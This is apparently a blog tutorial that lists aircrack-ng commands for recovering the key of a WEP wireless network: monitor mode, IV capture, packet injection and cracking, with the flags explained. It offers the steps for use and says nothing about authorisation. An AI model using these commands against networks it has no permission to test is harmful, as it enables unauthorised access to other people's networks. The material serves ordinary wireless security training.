Wireless Attack: WEP

The following is a quick-hit list of commands for attacking a WEP wireless network. It assumes you are using a 2016 variant of Kali linux with the aircrack-ng suite installed and a wireless network card that can be placed into monitor mode (which should be about 100% of them). It also assumes that there is a WEP network with an associated client that is transmitting, and that you are running as a user with sufficient permissions to execute each of these commands.

For the sake of this tutorial the AP will be assumed to have a MAC address of “DE:AD:DE:AD:DE:AD” and the client will be assumed to have a MAC address of “BE:AD:ED:BE:AD:ED”. The wireless network card we will use will be assumed to be “wlan0”.

UPDATE 2017-01-01: If a presentation is more your style of learning you can access training on this topic here: Wireless Attacks – WEP (basic_0x00)

First up, boot up Kali and shut down any potentially interfering programs:

airmon-ng check kill

Then put the interface into monitor mode:

airmon-ng start wlan0

Next up, find the target WEP network:

airodump-ng wlan0mon

Make sure to note the client (BE:AD:ED:BE:AD:ED for our example), the AP (DE:AD:DE:AD:DE:AD for our example), and the channel (10 for our example), then exit airodump-ng with CTRL+C. Now restart airodump-ng to capture the IVs for the network:

airodump-ng --channel 10 --bssid DE:AD:DE:AD:DE:AD -w wep-capture --ivs wlan0mon

Leave that running, then jump over to a new window/terminal and start injecting to stimulate IV creation. We’ll use a modified packet approach, since that’s a bit easier to find:

aireplay-ng -2 -b DE:AD:DE:AD:DE:AD -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon

To break that down a bit:

  • -2 means modified packet attack
  • -b means the AP address
  • -t 1 means to look for a candidate packet that has to “To Distribution System” value set
  • -c means the destination address (broadcast in this case)
  • -p 0841 means to set the “To Distribution” flag

Now in a third window/terminal start the crack:

aircrack-ng wep-capture

Select the target network, and let it sit. It will automatically poll the capture file and keep trying as thresholds are reached until the key is recovered. Remember that you need to try both “Open” and “Shared” key types as well as each key number to properly join the target network. Good hunting!

Comments are closed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: